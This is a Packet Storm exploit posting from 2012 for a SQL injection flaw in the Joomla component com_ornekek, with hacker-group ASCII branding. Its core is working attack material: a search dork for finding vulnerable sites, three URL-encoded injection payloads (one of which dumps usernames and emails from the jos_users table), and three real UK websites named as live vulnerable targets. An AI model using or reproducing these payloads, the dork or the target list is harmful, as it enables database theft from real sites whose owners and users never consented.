exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Joomla Ornekek SQL Injection

Joomla Ornekek SQL Injection
Posted Oct 21, 2012
Authored by Taurus Omar

The Joomla Ornekek component suffers from a remote SQL injection vulnerability. Note that this finding houses site-specific data.

tags | exploit, remote, sql injection
SHA-256 | ed53efa46f46da8cb1dfe5fca149ead15336c5bba017235b2324569bafabcdcb

Joomla Ornekek SQL Injection

Change Mirror Download
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [x] Official Website: http://www.1337day.com 0
1 [x] Support E-mail : mr.inj3ct0r[at]gmail[dot]com 1
0 0
1 ========================================== 1
0 I'm Taurus Omar Member From Inj3ct0r TEAM 1
1 ========================================== 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
| |
| Joomla Component Com_Ornekek - SQL Injection Vulnerability |
--------------------------------------------------------------------------
+----------------| ABOUT ME |--------------------+
NAME: TAURUS OMAR -
HOME: ACCESOILEGAL.BLOGSPOT.COM -
TWITTER: @taurusomar_ -
E-MAIL: omar-taurus[at]dragonsecurity[dot]org -
E-MAIL: omar-taurus[at]live[dot]com -
PWNED: #ZUUU -
+------------------------------------------------+

# Exploit Title: Joomla Component Com_Ornekek - SQL Injection Vulnerability
# Vendor Name: Joomla
# Url Vendor: http://www.joomla.org/
# Category: WebApps
# Type: php
# Dork: inurl:/index.php?option=com_ornekek&task=
# 0day exploits : 1337day.com Inj3ct0r Exploit DataBase

# Exploit Sample => http://site.com/index.php?option=com_ornekek&task=program&id=

# Exploit Comand => -999.9'+or+'x'%3D'y'+and+if(1%3D1%2CBENCHMARK(1528800%2CMD5(0x41))%2C0)+and+'x'%3D'x
# Exploit Comand => -999.9+union+select+1%2C2%2C3%2Cgroup_concat(0x3a5f%2Cusern ame%2C0x3a%2Cemail%2C0x5f3a)%2C5%2C6%2C7+from+jos_users--+union+all+select--
# Exploit Comand => -99+union+all+select+null%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull--

# Samples/Demo
http://www.rallyingwithprbenn.co.uk/index.php?option=com_ornekek&task=program&id= [ Sql ]
http://www.yewcraggsborrowdale.co.uk/index.php?option=com_ornekek&task=program&id= [ Sql ]
http://www.coledale-inn.co.uk/index.php?option=com_ornekek&task=program&id= [ Sql ]


Login or Register to add favorites

File Archive:

October 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    39 Files
  • 2
    Oct 2nd
    23 Files
  • 3
    Oct 3rd
    18 Files
  • 4
    Oct 4th
    20 Files
  • 5
    Oct 5th
    0 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close